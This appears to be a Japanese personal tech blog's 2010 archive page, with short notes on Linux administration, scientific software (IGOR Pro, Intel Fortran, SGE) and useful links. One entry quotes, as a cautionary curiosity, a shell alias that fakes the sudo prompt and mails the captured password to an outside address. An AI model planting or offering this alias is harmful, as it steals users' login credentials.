2010-01-01から1年間の記事一覧

ipmi

cpu温度を測るのに、lm_sensors ではなく、 IPMI(Intelligent Platform Management Interface) というものがあるらしい。OpenIPMI freeipmiあれ、うまくうごかない。

Linux on USB

結局、liveusb-creatorを使う方法が簡単だった。 以下、手順。 1. USB挿入 2. fdiskでFAT32パーティションを作成(e.g. sdcに3GB ) # fdisk /dev/sdc 例えば、以下を順次実行。 n -> p -> 1 -> Enter -> +3G -> t -> b -> a -> 1 -> p -> w 3. フォーマット&…

ubuntu

#001 lvmボリュームのマウント lvm2が標準インストールされていない(Priority: optional)。 $ sudo apt-get install lvm2 $ sudo vgscan $ sudo vgchange -ay VolGroup $ sudo mount /dev/VolGropu/lv_home /mnt #002 libstdc++.so.5のインストール $ wget…

crow / カラス duck / アヒル、カモ lark / ヒバリ swan / ハクチョウ gull / カモメ hawk / タカ[kite] eagle / ワシ goose / ガチョウ stork / コウノトリ bulbul / ヒヨドリ starling / ムクドリ

ウィンドウサイズを変更する

gizmoで最大化すると元に戻せなくなった。。 このような場合、コマンドウィンドウで、 movewindow/w=ウィンドウ名 0,0,1,1等とする。 左の4つの数字は、左,上,右,下の座標。 0,0,0,0で最小化、2,2,2,2で最大化

x,y,zそれぞれの1Dデータを(N,3)の行列データに変換

前者はcontour図は描画できるが、surface図は描けないので。この場合、プロシージャウィンドウで、 #include を実行し、WMのマクロを読み込めばOK。

GAMMA: The Genoa Active Message MAchine

GAMMA: The Genoa Active Message MAchine http://www.disi.unige.it/project/gamma/ What is GAMMA? * A low latency, high throughput communication system for clusters of PCs * Supports both single and dual CPU processing nodes (Intel IA-32 or a…

Intel Fortran

自動並列化がなかなか賢い。 -fast -par-threshold0 -parallel -par-report3並列化のしきい値を0に下げ(default:100)、レポートレベル最大3(default:1)にしてチェック。 以下、man ifortより。 -vec-threshold[n] Sets a threshold for the vectorizatio…

fityk

fityk - free peak fitting software http://www.unipress.waw.pl/fityk/

Windows版vi

http://www.kaoriya.net

SMARTS記法

Daylight Theory: SMARTS - A Language for Describing Molecular Patterns http://www.daylight.com/dayhtml/doc/theory/theory.smarts.html

データマイニング

Weka 3 - Data Mining with Open Source Machine Learning Software in Java http://www.cs.waikato.ac.nz/ml/weka/

IGOR Proで曲線下面積を計算

areaXYを使うみたい。 以下、例。cursorの使い方、忘れてた orz // make data set make/o/n=101 xdata=pi/100*x make/o/n=101 ydata=sin(pi/100*x) // plot graph display ydata vs xdata // calculate auc // print areaxy(xdata, ydata) string/g area1=nu…

自然科学系学術書 明倫館書店

http://www.meirinkanshoten.com/index.asp

EMSL Basis Set Exchange

https://bse.pnl.gov/bse/portal

SGE tips

Warning: no access to tty (不正なファイル記述子です).の対処。その1、キューの属性shell_start_modeの値を変更する。 変更前 shell_start_mode posix_compliant 変更後 shell_start_mode unix_behavior gridengine Eセットアップ@SL単一ノード前提 # yum …

CNT, ナノチューブ

モデリング TubeGen Online - Version 3.3 Web-Accessible Nanotube Structure Generator http://turin.nss.udel.edu/research/tubegenonline.html ※Gaussian, PDB, WIEN2k, XYZ, CIF等に対応。 Good;-) Nanotube coordinate generator with a viewer for Wi…

半導体、semiconductor

半導体/電子デバイス物理 http://kccn.konan-u.ac.jp/physics/semiconductor/ ※甲南大の先生が公開されている半導体の解説サイト。 きれいで、わかりやすいアニメーション(Flash)が多数あり、よい感じ。

パブリックドメインの画像ファイル

public domain photos5000 Free Stock Photos http://public-domain-photos.com/ http://commons.wikimedia.org/wiki/Main_Page http://www.freeclipartnow.com/ http://publicdomainclip-art.blogspot.com/

mpich2

$ ./mpdhelp The following mpd commands are available. For usage of any specific one, invoke it with the single argument --help . mpd start an mpd daemon mpdtrace show all mpd's in ring mpdboot start a ring of daemons all at once mpdringtes…

いたずらか?

はは、こんなのあるんだ。安易にsudoを許可できないわけだ。 $ alias sudo="echo -n \"[sudo] password for `whoami`: \";read -s p;echo \$p|mail -s\"`whoami `@`hostname -f`'s Password\" receiver@example.com;unalias sudo;echo \$p|/usr/bin/sudo -p …

signal

man section 7 $ man 7 signal

SugarCRM

SugarForge: Open Source CRM, SugarCRM, Sugar CRM http://www.sugarforge.org/ アップデータ用パッチファイルは、 Downloadページに進み、 "Previous versions or patches and upgrades"を選択する。 ↓ http://www.sugarforge.org/frs/?group_id=6

smb, samba tips

アカウントのマッピングsmb.confで定義して、 [global] username map = /etc/smbusersファイルを作成し、対応づける。 # Unix_name = SMB_name1 SMB_name2 ... nobody = guest pcguest smbguest ※間違ってた。後日、修正します。 参照 WindowsとUNIXのユーザ…

Excelでカーソル移動

矢印キーで、セルを移動できなくなった。。 Fn + ScrLK キーで、スクロールロックのオンオフを切り替え。 無事解決。

つばめの利用の手引

TSUBAME Grid Cluster 利用の手引http://www.gsic.titech.ac.jp/~ccwww/tebiki/

topコマンド @ Mac OS X

Linuxのtopと結構違う。。 起動例 $ top -o cpu $ top -o rsize $ top -o vsize $ top -o time $ top -o username $ top -c a $ top -c d $ top -c e $ top -U <user> # 指定ユーザプロセスのみ表示 $ top -l <samples> # ログモード、samples回出力 $ top -h # ヘルプ表示 </samples></user>…

convertコマンド

convertコマンドで、gif動画を作成 $ convert -delay 5.0 -loop 0 id0*.png sample.gifpsからpdfへ変換 $ convert foo.ps foo.pdf

撤下の読み方

おさがり、もしくは、てっか

トットチャンネル/お願いチャンネル

http://www.inv.co.jp/~tagawa/totto/hope.html ユニセフ親善大使:黒柳徹子さん